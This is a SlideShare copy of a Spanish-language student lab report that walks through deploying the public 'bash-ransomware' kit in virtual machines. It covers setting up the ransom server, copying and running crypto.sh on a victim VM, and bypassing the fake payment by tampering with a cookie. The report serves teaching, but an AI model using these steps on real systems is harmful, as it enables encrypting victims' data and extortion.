SlideShare ist ein Scribd-Unternehmen logo
1 von 14
Universidad Tecnológica de Panamá
Facultad de Ingeniería de Sistemas Computacionales
Licenciatura en Ingeniería de Sistema de Información
Curso:
Tópicos 1
Proyecto #1
“Bash-Ransomware”
Facilitador:
Jose Moreno
Integrantes:
Berrocal, Abdiel 8-891-2399
Monteza, Otman 8-892-586
Grupo:
1IF-252
En este proyecto se aborda el tema del ransomware. Se utilizó los scripts del
repositorio en github: https://github.com/SubtleScope/bash-ransomware.
El desarrollo de este proyecto consta de utilizar dos máquinas: una que es el
servidor donde se montarán los scripts del repositorio anteriormente mencionado y
otra máquina que nos servirá como cliente o víctima para este caso. En la
máquina víctima se ejecutará un script que cifrará todos los archivos del mismo.
Paso 1:
Crear una máquina virtual (Ubuntu server) que será la máquina server, en la cual
se montarán los scripts.
Para la segunda máquina podemos hacer un clon de la primera, ya que solo
ejecutaremos el script de cifrado en ella.
Figura #1
Paso 2:
Una vez encendida la máquina (Ransom-ServerSide) procederemos a descargar
los archivos del repositorio. Utilizamos el comando git clone para clonar el
repositorio en la máquina.
Comando: git clone https://github.com/SubtleScope/bash-ransomware
Figura #2
Paso 3:
Copiamos el contenido de la carpeta bash-ransomware en la dirección
/var/www/html
Le cambiamos los permisos con: chown -R www-data:root /var/www/html
Figura #3
Paso 4:
Dentro de la carpeta html se encuentran los archivos del repositorio que habíamos
clonado con anterioridad. En estos debemos realizar ciertas configuraciones que
la guía en github nos indican.
Imagen #4
En el archivo “target.php” debemos cambiar las líneas donde se manejan las
variables de tiempo (fecha y hora).
Figura #5
Paso 5:
Creación de la llave y certificados con openssl.
Figura #6
Una vez hecho esto, los movemos a la siguiente dirección: /etc/ssl/. En esta
existen dos carpetas: certs y private. Los moveremos de la siguiente manera:
Comando para mover el server.crt: mv server.crt /etc/ssl/certs/
Comando para mover el server.key: mv server.key /etc/ssl/private/
Imagen #7
Lo siguiente que haremos es reiniciar el ssl con el comando: a2enmod ssl.
Después reiniciamos el apache con: systemctl restart apache2.
Paso 6: seguimos con las configuraciones, ahora es con el archivo “crypto.sh”.
Primero nos dirigimos a la dirección “/var/www/html” si no nos encontrábamos allí
desde antes. Creamos la carpeta “downloads” con el comando mkdir (Ej. mkdir
downloads).
Configuramos el archivo crypto.sh con lo siguiente:
Figura #8
La primera línea nos indica que en todo el archivo cuando encuentre la cadena
“192.168.1.132” lo cambie por las Y’s (estas Y’s son la Ip de nuestro servidor).
La segunda línea es si lo queremos cambiar por un dominio.
Copiamos el archivo “crypto.sh” en la carpeta que habíamos creado “downloads”.
Paso 7: creación de la base de datos victims y exchange.
Creación de “victims”:
Figura #9
Figura #10
Creación de “exchange”:
Figura #11
Figura #12
Paso 8: lado del cliente o víctima.
Procedemos a descargar el archivo “crypto.sh”, que es el encargado de cifrar la
máquina cliente (víctima), utilizando el comando “scp” (secure copy) el cual se
comunica con ssh.
Comando: scp -P [#puerto] [user]@[serverip]:/dirección/para/copiar /dirección/para/pegar
O el
Comando: scp -P [#puerto] [user]@[serverip]:/dirección/origen /dirección/destino
Ejemplo: si el #puerto es distinto de 22 se debe escribir después de la opción -P, de otro
modo se puede dejar así.
Comando: scp user@YYY.YYY.YYY.YYY:/var/www/html/downloads/crypto.sh /home/user
Figura #13
Nota: “cuando se ejecuta este comando nos presentará una huella digital para la conexión en el
cual escribiremos “yes” para continuar, luego nos pedirá la contraseña del servidor al cual nos
queremos conectar. Si la contraseña se ingresó correctamente nos descargará (copiará) el archivo
que pedimos en la ruta de destino que elegimos.”
El user se cambia por el nombre de usuario y las Y’s se cambian por la ip del
server que se posea.
Paso 9: ejecución del script “crypto.sh”.
Estando aún en la máquina víctima le damos permiso 755 con el comando:
“chmod 755 crypto.sh”.
Luego lo ejecutamos utilizando sudo ./crypto.sh o si estamos en modo root,
solamente teclear ./crypto.sh.
Esperamos hasta que se termine de cifrar.
Figura #14
Una vez finalizado el cifrado, nos mostrará un mensaje como el de la “figura #14”
con la dirección a visitar y un “id”.
https://192.168.227.100/decrypt.php en este caso.
Paso 10: ingresar por medio del browser a la dirección dada en la “figura #14”
Figura #15
Procedemos a ingresar el “id” que nos muestra en la “figura #14”
Figura #16
También podemos observar el tiempo que le queda y otra información en
https://192.168.227.100/admin.php
Figura #17
Paso 11: le damos click en “Pay here”. Figura #16. Nos dirigirá al sitio de pago
donde haremos click en: “M4dH4t’z Exchange”.
Figura #18
Este a su vez nos dirigirá a esta otra página:
Figura #19
En la “Figura #19” nos registraremos. Este nos dará un (1) bitcoin, sin embargo,
para poder descifrar nuestros archivos necesitaremos 4 más.
Nos registramos utilizando:
Username: bobilibobili
Password: 12345
Figura #20
Paso 12: uso de la herramienta “Tamper Data”. Esta herramienta se puede
instalar en el navegador Firefox (navegador utilizado para este proyecto). Solo
debemos ir a instalar extensiones y buscar “Tamper data”.
Figura #21
Figura #22
Hacemos click en Tamper Data, luego en “Start” (iniciar).
Una vez iniciado le damos click en registrar, esto accionará lo siguiente en el
Tamper Data:
Figura #23
Le hacemos click en “Tamper”
Figura #24
Si nos fijamos en la figura #24 en la sección “Cookie” podemos observar la
cantidad de bitcoins que nos están dando. En este caso lo modificaremos con otro
valor distinto de uno (1), pero mayor a cinco (5), ya que para poder descifrar
nuestros archivos necesitamos cinco (5) bitcoins, es solo para asegurarnos de
tener los suficientes bitcoins.
Le asignamos cincuenta (50) bitcoins en la sección “Cookie”.
Figura #25
Le hacemos click en “OK” en la figura #25.
Figura #26
Nos dará nuestro id de transacción el cual deberemos copiar.
Paso 13: ingresar el id de transacción dado anteriormente.
Figura #27
Luego le damos click en “Pay”.
Nos mostrará el tiempo que debemos esperar para poder descifrar nuestros
archivos.
Figura #28
Paso 14: podemos observar nuevamente en https://192.168.227.100/admin.php si
se realizó el pago.
Figura #29
Paso 15: descargar los archivos para descifrar.
Figura #30
Paso 16: copiar los archivos descargados a la máquina víctima.
Para este caso utilizamos una tercera máquina con BackBox, en el cual
descargamos los archivos para descifrar y los copiaremos a la máquina victima
utilizando el comando, anteriormente mencionado, “scp”. Esta vez el comando
tendrá un ligero cambio, ya que copiaremos del BackBox a la máquina victima por
lo que escribiremos el comando de esta manera.
Comando: scp /dirección/backbox/copiar user@ipserver:/direccion/destino/pegado
Figura #31
Ejecutamos el decrypto.sh en la máquina víctima con el comando sudo
./decrypto.sh o si estamos en modo root escribir solamente ./decrypto.sh y
deberemos tener después nuestros archivos descifrados.
Figura #32

Weitere ähnliche Inhalte

Was ist angesagt?

Configuracion
ConfiguracionConfiguracion
Configuracion
UTN
 
Aprendiendopostgresql 090812172635-phpapp01
Aprendiendopostgresql 090812172635-phpapp01Aprendiendopostgresql 090812172635-phpapp01
Aprendiendopostgresql 090812172635-phpapp01
DC FCP
 
Manual de Encriptacion con TLS
Manual de Encriptacion con TLSManual de Encriptacion con TLS
Manual de Encriptacion con TLS
K-milo Rivera
 
Manual de squid creado por juanextk
Manual de squid creado por juanextkManual de squid creado por juanextk
Manual de squid creado por juanextk
juanextk
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
David Vevelas
 
Practica 2 FTP
Practica 2 FTPPractica 2 FTP
Practica 2 FTP
Terrafx9
 
Configuracion de proxy squid en centos
Configuracion de proxy squid en centosConfiguracion de proxy squid en centos
Configuracion de proxy squid en centos
murilloyair
 
Web centos
Web centosWeb centos
Web centos
jessidi
 

Was ist angesagt? (20)

Manual FTP, SSH y OpenMedia Vault
Manual FTP, SSH y OpenMedia VaultManual FTP, SSH y OpenMedia Vault
Manual FTP, SSH y OpenMedia Vault
 
Configurar un servicio dhcp en centos 7
Configurar un servicio dhcp en centos 7Configurar un servicio dhcp en centos 7
Configurar un servicio dhcp en centos 7
 
Configuracion
ConfiguracionConfiguracion
Configuracion
 
Aprendiendopostgresql 090812172635-phpapp01
Aprendiendopostgresql 090812172635-phpapp01Aprendiendopostgresql 090812172635-phpapp01
Aprendiendopostgresql 090812172635-phpapp01
 
Manual de Encriptacion con TLS
Manual de Encriptacion con TLSManual de Encriptacion con TLS
Manual de Encriptacion con TLS
 
Manual de squid creado por juanextk
Manual de squid creado por juanextkManual de squid creado por juanextk
Manual de squid creado por juanextk
 
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry PiServicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
 
Lo que será windows 8
Lo que será windows 8Lo que será windows 8
Lo que será windows 8
 
Instalación y configuración de Nagios
Instalación y configuración de NagiosInstalación y configuración de Nagios
Instalación y configuración de Nagios
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
 
Practica 2 FTP
Practica 2 FTPPractica 2 FTP
Practica 2 FTP
 
Curso Squid avanzado
Curso Squid avanzadoCurso Squid avanzado
Curso Squid avanzado
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
 
Crear un usuario virtual en el servidor vsftpd con centos 7
Crear un usuario virtual en el servidor vsftpd con centos 7Crear un usuario virtual en el servidor vsftpd con centos 7
Crear un usuario virtual en el servidor vsftpd con centos 7
 
Configuracion de proxy squid en centos
Configuracion de proxy squid en centosConfiguracion de proxy squid en centos
Configuracion de proxy squid en centos
 
Configuracion del servidor http en centos 7
Configuracion del servidor http en centos 7Configuracion del servidor http en centos 7
Configuracion del servidor http en centos 7
 
Aplicaciones Web Seguras (Anti-SQLi)
Aplicaciones Web Seguras (Anti-SQLi)Aplicaciones Web Seguras (Anti-SQLi)
Aplicaciones Web Seguras (Anti-SQLi)
 
Web centos
Web centosWeb centos
Web centos
 
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
 
Manual Servidor Proxy Squid3
Manual Servidor Proxy Squid3Manual Servidor Proxy Squid3
Manual Servidor Proxy Squid3
 

Ähnlich wie Bash Ransomware

188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
Agencia Aduanera Almeida
 
Practica 15 21 qde cota
Practica 15  21 qde cotaPractica 15  21 qde cota
Practica 15 21 qde cota
Julio Padilla
 
Proyecto 5
Proyecto 5Proyecto 5
Proyecto 5
davister
 
(Manual de instalación de cloud computing)
(Manual de instalación de cloud computing)(Manual de instalación de cloud computing)
(Manual de instalación de cloud computing)
Giovanny Echeverry
 
Tutorial linux centos configuraciones básicas
Tutorial linux centos configuraciones básicasTutorial linux centos configuraciones básicas
Tutorial linux centos configuraciones básicas
UTP
 

Ähnlich wie Bash Ransomware (20)

Lab 3 cifrado criptografia
Lab 3   cifrado criptografiaLab 3   cifrado criptografia
Lab 3 cifrado criptografia
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocina
 
INSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLINSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSL
 
Uso del troyano cybergate ok
Uso del troyano cybergate okUso del troyano cybergate ok
Uso del troyano cybergate ok
 
Subiendo shell y explotando vulnerabilidad lfi vía phpinput
Subiendo shell y explotando vulnerabilidad lfi vía phpinputSubiendo shell y explotando vulnerabilidad lfi vía phpinput
Subiendo shell y explotando vulnerabilidad lfi vía phpinput
 
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
 
Vpn linux a linux
Vpn linux a linuxVpn linux a linux
Vpn linux a linux
 
Practica 15 21 qde cota
Practica 15  21 qde cotaPractica 15  21 qde cota
Practica 15 21 qde cota
 
Internal.docx
Internal.docxInternal.docx
Internal.docx
 
CentOS 6.4 como DNS, Apache, SSL...
CentOS 6.4 como DNS, Apache, SSL...CentOS 6.4 como DNS, Apache, SSL...
CentOS 6.4 como DNS, Apache, SSL...
 
Proyecto 5
Proyecto 5Proyecto 5
Proyecto 5
 
Hack like a pro with custom VPS - Najava Negra 2019
Hack like a pro with custom VPS - Najava Negra 2019Hack like a pro with custom VPS - Najava Negra 2019
Hack like a pro with custom VPS - Najava Negra 2019
 
Tutorial Git y Smart Git
Tutorial Git y Smart GitTutorial Git y Smart Git
Tutorial Git y Smart Git
 
5 servidor web
5 servidor web5 servidor web
5 servidor web
 
Servidor apache
Servidor apacheServidor apache
Servidor apache
 
Seguridad Base de Datos Ataque Troyano
Seguridad Base de Datos Ataque TroyanoSeguridad Base de Datos Ataque Troyano
Seguridad Base de Datos Ataque Troyano
 
Team.docx
Team.docxTeam.docx
Team.docx
 
(Manual de instalación de cloud computing)
(Manual de instalación de cloud computing)(Manual de instalación de cloud computing)
(Manual de instalación de cloud computing)
 
Tutorial linux centos configuraciones básicas
Tutorial linux centos configuraciones básicasTutorial linux centos configuraciones básicas
Tutorial linux centos configuraciones básicas
 
configuracion de servicios en ubuntu
configuracion de servicios en ubuntuconfiguracion de servicios en ubuntu
configuracion de servicios en ubuntu
 

Mehr von José Moreno

Seguridad Perimetral
Seguridad PerimetralSeguridad Perimetral
Seguridad Perimetral
José Moreno
 
Hardening en-nix-asegurar-un-ftp-server
Hardening en-nix-asegurar-un-ftp-serverHardening en-nix-asegurar-un-ftp-server
Hardening en-nix-asegurar-un-ftp-server
José Moreno
 

Mehr von José Moreno (17)

Android reversing 101.pdf
Android reversing 101.pdfAndroid reversing 101.pdf
Android reversing 101.pdf
 
Ransomware Hidden Tear
Ransomware Hidden TearRansomware Hidden Tear
Ransomware Hidden Tear
 
Seguridad Móvil
Seguridad MóvilSeguridad Móvil
Seguridad Móvil
 
Seguridad en SIstemas Operativos *Nix
Seguridad en SIstemas Operativos *NixSeguridad en SIstemas Operativos *Nix
Seguridad en SIstemas Operativos *Nix
 
Honey Pots
Honey PotsHoney Pots
Honey Pots
 
Seguridad Perimetral
Seguridad PerimetralSeguridad Perimetral
Seguridad Perimetral
 
Correlacionador de Eventos OSSIM
Correlacionador de Eventos OSSIMCorrelacionador de Eventos OSSIM
Correlacionador de Eventos OSSIM
 
Forensia en movil
Forensia en movil Forensia en movil
Forensia en movil
 
Artefactos linux
Artefactos linuxArtefactos linux
Artefactos linux
 
MEAN Stack
MEAN StackMEAN Stack
MEAN Stack
 
Backbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuBackbox Distribución deriva de Ubuntu
Backbox Distribución deriva de Ubuntu
 
Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0
 
Presentacion #2 github Aplicaciones Seguras
Presentacion #2 github Aplicaciones SegurasPresentacion #2 github Aplicaciones Seguras
Presentacion #2 github Aplicaciones Seguras
 
Hardening Telnet ssh final
Hardening Telnet ssh finalHardening Telnet ssh final
Hardening Telnet ssh final
 
Protección de Sitios Web con WAF Lógico
Protección de Sitios Web con WAF LógicoProtección de Sitios Web con WAF Lógico
Protección de Sitios Web con WAF Lógico
 
Laboratorio 7 mod security - evasive - qos
Laboratorio 7   mod security - evasive - qosLaboratorio 7   mod security - evasive - qos
Laboratorio 7 mod security - evasive - qos
 
Hardening en-nix-asegurar-un-ftp-server
Hardening en-nix-asegurar-un-ftp-serverHardening en-nix-asegurar-un-ftp-server
Hardening en-nix-asegurar-un-ftp-server
 

Kürzlich hochgeladen

redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativa
nicho110
 

Kürzlich hochgeladen (11)

Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
 
Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvana
 
Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21
 
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptxPROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
 
Guia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosGuia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos Basicos
 
How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.
 
Buenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxBuenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptx
 
redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativa
 
investigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIinvestigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXI
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estos
 
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxEVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
 

Bash Ransomware

  • 1. Universidad Tecnológica de Panamá Facultad de Ingeniería de Sistemas Computacionales Licenciatura en Ingeniería de Sistema de Información Curso: Tópicos 1 Proyecto #1 “Bash-Ransomware” Facilitador: Jose Moreno Integrantes: Berrocal, Abdiel 8-891-2399 Monteza, Otman 8-892-586 Grupo: 1IF-252
  • 2. En este proyecto se aborda el tema del ransomware. Se utilizó los scripts del repositorio en github: https://github.com/SubtleScope/bash-ransomware. El desarrollo de este proyecto consta de utilizar dos máquinas: una que es el servidor donde se montarán los scripts del repositorio anteriormente mencionado y otra máquina que nos servirá como cliente o víctima para este caso. En la máquina víctima se ejecutará un script que cifrará todos los archivos del mismo. Paso 1: Crear una máquina virtual (Ubuntu server) que será la máquina server, en la cual se montarán los scripts. Para la segunda máquina podemos hacer un clon de la primera, ya que solo ejecutaremos el script de cifrado en ella. Figura #1 Paso 2: Una vez encendida la máquina (Ransom-ServerSide) procederemos a descargar los archivos del repositorio. Utilizamos el comando git clone para clonar el repositorio en la máquina. Comando: git clone https://github.com/SubtleScope/bash-ransomware Figura #2 Paso 3: Copiamos el contenido de la carpeta bash-ransomware en la dirección /var/www/html
  • 3. Le cambiamos los permisos con: chown -R www-data:root /var/www/html Figura #3 Paso 4: Dentro de la carpeta html se encuentran los archivos del repositorio que habíamos clonado con anterioridad. En estos debemos realizar ciertas configuraciones que la guía en github nos indican. Imagen #4 En el archivo “target.php” debemos cambiar las líneas donde se manejan las variables de tiempo (fecha y hora). Figura #5
  • 4. Paso 5: Creación de la llave y certificados con openssl. Figura #6 Una vez hecho esto, los movemos a la siguiente dirección: /etc/ssl/. En esta existen dos carpetas: certs y private. Los moveremos de la siguiente manera: Comando para mover el server.crt: mv server.crt /etc/ssl/certs/ Comando para mover el server.key: mv server.key /etc/ssl/private/ Imagen #7 Lo siguiente que haremos es reiniciar el ssl con el comando: a2enmod ssl. Después reiniciamos el apache con: systemctl restart apache2. Paso 6: seguimos con las configuraciones, ahora es con el archivo “crypto.sh”. Primero nos dirigimos a la dirección “/var/www/html” si no nos encontrábamos allí desde antes. Creamos la carpeta “downloads” con el comando mkdir (Ej. mkdir downloads). Configuramos el archivo crypto.sh con lo siguiente: Figura #8 La primera línea nos indica que en todo el archivo cuando encuentre la cadena “192.168.1.132” lo cambie por las Y’s (estas Y’s son la Ip de nuestro servidor). La segunda línea es si lo queremos cambiar por un dominio.
  • 5. Copiamos el archivo “crypto.sh” en la carpeta que habíamos creado “downloads”. Paso 7: creación de la base de datos victims y exchange. Creación de “victims”: Figura #9 Figura #10 Creación de “exchange”: Figura #11 Figura #12
  • 6. Paso 8: lado del cliente o víctima. Procedemos a descargar el archivo “crypto.sh”, que es el encargado de cifrar la máquina cliente (víctima), utilizando el comando “scp” (secure copy) el cual se comunica con ssh. Comando: scp -P [#puerto] [user]@[serverip]:/dirección/para/copiar /dirección/para/pegar O el Comando: scp -P [#puerto] [user]@[serverip]:/dirección/origen /dirección/destino Ejemplo: si el #puerto es distinto de 22 se debe escribir después de la opción -P, de otro modo se puede dejar así. Comando: scp user@YYY.YYY.YYY.YYY:/var/www/html/downloads/crypto.sh /home/user Figura #13 Nota: “cuando se ejecuta este comando nos presentará una huella digital para la conexión en el cual escribiremos “yes” para continuar, luego nos pedirá la contraseña del servidor al cual nos queremos conectar. Si la contraseña se ingresó correctamente nos descargará (copiará) el archivo que pedimos en la ruta de destino que elegimos.” El user se cambia por el nombre de usuario y las Y’s se cambian por la ip del server que se posea. Paso 9: ejecución del script “crypto.sh”. Estando aún en la máquina víctima le damos permiso 755 con el comando: “chmod 755 crypto.sh”. Luego lo ejecutamos utilizando sudo ./crypto.sh o si estamos en modo root, solamente teclear ./crypto.sh. Esperamos hasta que se termine de cifrar. Figura #14 Una vez finalizado el cifrado, nos mostrará un mensaje como el de la “figura #14” con la dirección a visitar y un “id”. https://192.168.227.100/decrypt.php en este caso.
  • 7. Paso 10: ingresar por medio del browser a la dirección dada en la “figura #14” Figura #15 Procedemos a ingresar el “id” que nos muestra en la “figura #14” Figura #16
  • 8. También podemos observar el tiempo que le queda y otra información en https://192.168.227.100/admin.php Figura #17 Paso 11: le damos click en “Pay here”. Figura #16. Nos dirigirá al sitio de pago donde haremos click en: “M4dH4t’z Exchange”. Figura #18
  • 9. Este a su vez nos dirigirá a esta otra página: Figura #19 En la “Figura #19” nos registraremos. Este nos dará un (1) bitcoin, sin embargo, para poder descifrar nuestros archivos necesitaremos 4 más. Nos registramos utilizando: Username: bobilibobili Password: 12345 Figura #20
  • 10. Paso 12: uso de la herramienta “Tamper Data”. Esta herramienta se puede instalar en el navegador Firefox (navegador utilizado para este proyecto). Solo debemos ir a instalar extensiones y buscar “Tamper data”. Figura #21 Figura #22
  • 11. Hacemos click en Tamper Data, luego en “Start” (iniciar). Una vez iniciado le damos click en registrar, esto accionará lo siguiente en el Tamper Data: Figura #23 Le hacemos click en “Tamper” Figura #24 Si nos fijamos en la figura #24 en la sección “Cookie” podemos observar la cantidad de bitcoins que nos están dando. En este caso lo modificaremos con otro valor distinto de uno (1), pero mayor a cinco (5), ya que para poder descifrar nuestros archivos necesitamos cinco (5) bitcoins, es solo para asegurarnos de tener los suficientes bitcoins. Le asignamos cincuenta (50) bitcoins en la sección “Cookie”.
  • 12. Figura #25 Le hacemos click en “OK” en la figura #25. Figura #26 Nos dará nuestro id de transacción el cual deberemos copiar.
  • 13. Paso 13: ingresar el id de transacción dado anteriormente. Figura #27 Luego le damos click en “Pay”. Nos mostrará el tiempo que debemos esperar para poder descifrar nuestros archivos. Figura #28 Paso 14: podemos observar nuevamente en https://192.168.227.100/admin.php si se realizó el pago. Figura #29
  • 14. Paso 15: descargar los archivos para descifrar. Figura #30 Paso 16: copiar los archivos descargados a la máquina víctima. Para este caso utilizamos una tercera máquina con BackBox, en el cual descargamos los archivos para descifrar y los copiaremos a la máquina victima utilizando el comando, anteriormente mencionado, “scp”. Esta vez el comando tendrá un ligero cambio, ya que copiaremos del BackBox a la máquina victima por lo que escribiremos el comando de esta manera. Comando: scp /dirección/backbox/copiar user@ipserver:/direccion/destino/pegado Figura #31 Ejecutamos el decrypto.sh en la máquina víctima con el comando sudo ./decrypto.sh o si estamos en modo root escribir solamente ./decrypto.sh y deberemos tener después nuestros archivos descifrados. Figura #32